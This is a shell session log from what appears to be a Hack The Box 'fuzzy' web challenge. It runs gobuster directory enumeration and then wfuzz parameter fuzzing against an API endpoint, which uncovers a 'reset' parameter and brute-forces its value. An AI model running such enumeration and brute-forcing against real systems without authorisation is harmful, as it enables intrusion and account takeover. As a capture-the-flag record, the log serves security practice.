root@root:~/Downloads/HTB/VIP/Challenges/web/fuzzy# cat gobuster
root@root:~/Downloads/HTB/VIP/Challenges/fuzzy# gobuster dir -u http://docker.hackthebox.eu:30921/api/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,htm,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://docker.hackthebox.eu:30921/api/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,htm,txt
[+] Timeout:        10s
===============================================================
2020/03/14 17:41:56 Starting gobuster
===============================================================
/index.html (Status: 200)
/action.php (Status: 200)
root@root:~/Downloads/HTB/VIP/Challenges/web/fuzzy# wfuzz -hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:31909/api/action.php?FUZZ=test

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
*                                                      *
* Version up to 1.4c coded by:                         *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com)                   *
*                                                      *
* Version 1.4d to 2.4.5 coded by:                      *
* Xavier Mendez (xmendez@edge-security.com)            *
********************************************************

Usage:	wfuzz [options] -z payload,params <url>

	FUZZ, ..., FUZnZ  wherever you put these keywords wfuzz will replace them with the values of the specified payload.
	FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.


Examples:
	wfuzz -c -z file,users.txt -z file,pass.txt --sc 200 http://www.site.com/log.asp?user=FUZZ&pass=FUZ2Z
	wfuzz -c -z range,1-10 --hc=BBB http://www.site.com/FUZZ{something not there}
	wfuzz --script=robots -z list,robots.txt http://www.webscantest.com/FUZZ

Type wfuzz -h for further information or --help for advanced usage.

Fatal exception: option -= not recognized.
root@root:~/Downloads/HTB/VIP/Challenges/web/fuzzy# wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:31909/api/action.php?FUZZ=test

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://docker.hackthebox.eu:31909/api/action.php?FUZZ=test
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                     
===================================================================

000015356:   200        0 L      5 W      27 Ch       "reset"                                                                                                                                                                     
000020332:   200        0 L      4 W      24 Ch       "zaloguj"                                                                                                                                                                   ^C
Finishing pending requests...
root@root:~/Downloads/HTB/VIP/Challenges/web/fuzzy# wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:31909/api/action.php?reset=FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://docker.hackthebox.eu:31909/api/action.php?reset=FUZZ
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                     
===================================================================

000000318:   200        0 L      10 W     74 Ch       "20"                                                                                                                                                                        
000004262:   200        0 L      5 W      27 Ch       "cec"                                                                                                                                                                       sidharth.si000004550:   200        0 L      5 W      27 Ch       "chs"                                                                                                                                                                       ^C
Finishing pending requests.
